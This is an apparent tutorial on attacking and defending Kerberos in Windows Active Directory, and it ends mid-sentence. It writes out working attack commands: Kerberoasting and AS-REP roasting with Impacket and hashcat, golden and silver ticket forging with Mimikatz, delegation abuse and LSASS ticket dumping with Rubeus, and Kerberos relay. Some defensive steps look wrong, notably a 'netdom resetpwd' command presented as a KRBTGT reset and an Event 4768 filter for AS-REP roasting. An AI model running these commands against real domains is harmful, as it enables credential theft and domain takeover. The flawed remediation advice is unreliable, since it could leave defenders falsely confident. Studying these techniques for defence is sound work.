Active Directory Kerberos Attacks: How to Exploit and Secure Windows Authentication

Kerberos is the backbone of Windows Active Directory authentication, but its complexity creates numerous attack vectors that cybersecurity professionals must understand. This comprehensive guide explores common Kerberos attacks, practical exploitation techniques, and essential security measures to protect your organization's Windows infrastructure.

Active Directory environments rely heavily on the Kerberos protocol for secure authentication across networked systems. While Kerberos provides robust security when properly configured, misconfigurations and inherent protocol weaknesses can expose organizations to sophisticated attacks. Understanding these vulnerabilities is crucial for both offensive security testing and defensive hardening.

In this tutorial, we'll examine the most prevalent Kerberos attack vectors, demonstrate practical exploitation techniques using real-world tools, and provide actionable security recommendations to strengthen your Active Directory defenses.

Understanding Kerberos Authentication Flow

Before diving into attacks, it's essential to understand how Kerberos authentication works in Active Directory environments. The protocol involves three main components: the client, the service, and the Key Distribution Center (KDC), which runs on domain controllers.

The basic Kerberos flow consists of:

• Authentication Server (AS) Request: Client requests a Ticket Granting Ticket (TGT)
• AS Response: KDC provides TGT encrypted with user's password hash
• Ticket Granting Server (TGS) Request: Client uses TGT to request service ticket
• TGS Response: KDC provides service ticket encrypted with service account's hash
• Application Request: Client presents service ticket to target service

This multi-step process creates several potential attack surfaces that malicious actors can exploit to gain unauthorized access or escalate privileges within the domain.

Common Kerberos Attack Techniques

Kerberoasting Attack

Kerberoasting targets service accounts by requesting service tickets and attempting to crack the encrypted portions offline. This attack exploits the fact that service tickets are encrypted with the target service account's password hash.

Here's how to perform a basic Kerberoasting attack using Impacket:

# Request service tickets for all SPNs
python GetUserSPNs.py domain.local/username:password -dc-ip 10.0.0.1 -request

# Extract hashes for offline cracking
python GetUserSPNs.py domain.local/username:password -dc-ip 10.0.0.1 -request -outputfile hashes.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

Kerberoasting is particularly effective because it doesn't require elevated privileges and generates minimal suspicious network traffic. Service accounts often have weak passwords and broad permissions, making them attractive targets.

ASREPRoasting Attack

ASREPRoasting targets user accounts that don't require Kerberos pre-authentication. When pre-authentication is disabled, attackers can request authentication data for offline password cracking without knowing the user's password.

# Identify users without pre-auth required
python GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.0.0.1

# Request AS-REP for vulnerable users
python GetNPUsers.py domain.local/username -dc-ip 10.0.0.1 -no-pass

# Crack the extracted hash
hashcat -m 18200 asrep_hash.txt wordlist.txt

This attack is less common than Kerberoasting but can be devastating when successful, as it often targets privileged user accounts with the "Do not require Kerberos preauthentication" setting enabled.

Golden Ticket Attack

Golden Ticket attacks involve forging Ticket Granting Tickets using the KRBTGT account's password hash. Once an attacker obtains this hash, they can create tickets for any user, including non-existent ones, with any privileges.

# Create a Golden Ticket using Mimikatz
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi

# Use the ticket for authentication
mimikatz # kerberos::ptt golden.kirbi

Golden Tickets provide persistent access to the domain and are extremely difficult to detect since they use valid Kerberos authentication mechanisms. The forged tickets can have extended lifespans, maintaining access even after password changes.

Silver Ticket Attack

Silver Tickets are forged service tickets created using a compromised service account's password hash. Unlike Golden Tickets, Silver Tickets target specific services but don't require domain controller compromise.

# Create Silver Ticket for CIFS service
mimikatz # kerberos::golden /user:admin /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:service_hash /ticket:silver.kirbi

Silver Tickets are more limited in scope but harder to detect since they don't communicate with domain controllers for validation, making them valuable for maintaining stealthy access to specific resources.

Advanced Kerberos Exploitation Techniques

Constrained Delegation Abuse

Kerberos Constrained Delegation allows services to impersonate users to specific backend services. When misconfigured, attackers can abuse this feature to escalate privileges or access sensitive resources.

# Find accounts with constrained delegation
Get-ADUser -Filter {msDS-AllowedToDelegateTo -like "*"} -Properties msDS-AllowedToDelegateTo

# Abuse delegation using Rubeus
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.local

Unconstrained Delegation Exploitation

Unconstrained delegation is even more dangerous, allowing services to impersonate any user to any service. Computers with this setting can be compromised to capture TGTs from connecting users.

# Monitor for TGTs using Rubeus
Rubeus.exe monitor /interval:5 /nowrap

# Extract TGTs from LSASS
Rubeus.exe dump /service:krbtgt /nowrap

Kerberos Relay Attacks

These attacks combine Kerberos authentication with relay techniques to authenticate to target services using captured tickets or authentication attempts.

# Set up Kerberos relay using krbrelayx
python krbrelayx.py -t ldap://dc.domain.local

# Trigger authentication from target
# Use social engineering or other techniques

Detection and Monitoring Strategies

Detecting Kerberos attacks requires comprehensive logging and monitoring of authentication events. Key indicators include:

• Unusual TGS requests: High volumes of service ticket requests may indicate Kerberoasting
• AS-REP requests without pre-auth: Monitor Event ID 4768 for pre-authentication failures
• Abnormal ticket lifespans: Golden tickets often have suspicious expiration times
• Service ticket anomalies: Silver tickets may show unusual service access patterns

Implement these PowerShell commands for basic monitoring:

# Monitor for Kerberoasting activity
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object {$_.Message -like "*0x17*"}

# Check for ASREPRoasting attempts
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -like "*0x18*"}

Defense and Mitigation Strategies

Service Account Hardening

Protecting service accounts is crucial for preventing Kerberoasting attacks:

• Use Group Managed Service Accounts (gMSA) with automatically generated complex passwords
• Implement long, complex passwords for service accounts (25+ characters)
• Regularly rotate service account passwords using automated tools
• Apply the principle of least privilege to service account permissions

Kerberos Configuration Hardening

Strengthen your Kerberos implementation with these configuration changes:

# Enable AES encryption for Kerberos
Set-ADUser -Identity serviceaccount -KerberosEncryptionType AES128,AES256

# Disable RC4 encryption where possible
# Configure via Group Policy: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

Privileged Access Management

Implement robust controls around privileged accounts:

• Use Privileged Access Workstations (PAWs) for administrative tasks
• Implement just-in-time (JIT) access for administrative privileges
• Enable Protected Users group for high-value accounts
• Configure Authentication Policies and Silos for fine-grained access control

Network Segmentation and Monitoring

Deploy network-level protections to limit attack impact:

• Segment networks to isolate critical domain controllers
• Implement network monitoring for unusual Kerberos traffic patterns
• Deploy honeypots with attractive SPNs to detect Kerberoasting attempts
• Use behavioral analytics to identify anomalous authentication patterns

Incident Response for Kerberos Attacks

When Kerberos attacks are detected, rapid response is essential:

1. Immediate containment: Disable compromised accounts and isolate affected systems
2. Password resets: Force password changes for potentially compromised accounts
3. KRBTGT reset: If Golden Ticket attack is suspected, reset KRBTGT password twice
4. Forensic analysis: Examine logs to determine attack scope and timeline
5. Recovery planning: Rebuild compromised systems and strengthen security controls

# Reset KRBTGT password (run twice, 10 hours apart)
netdom resetpwd /s:domain-controller /ud:domain\administrator /pd:password

Next Steps and Continuous Improvement

Mastering Kerberos security requires ongoing effort and continuous learning. Start by conducting a thorough assessment of your current Active Directory configuration, identifying service accounts with weak passwords, and implementing basic hardening measures.

Practice these attack techniques in a controlled lab environment to better understand the attacker perspective. Tools like BloodHound, PingCastle, and Purple Knight can help identify potential vulnerabilities in your environment.

Consider pursuing advanced certifications like GIAC GCIH or OSCP to deepen your understanding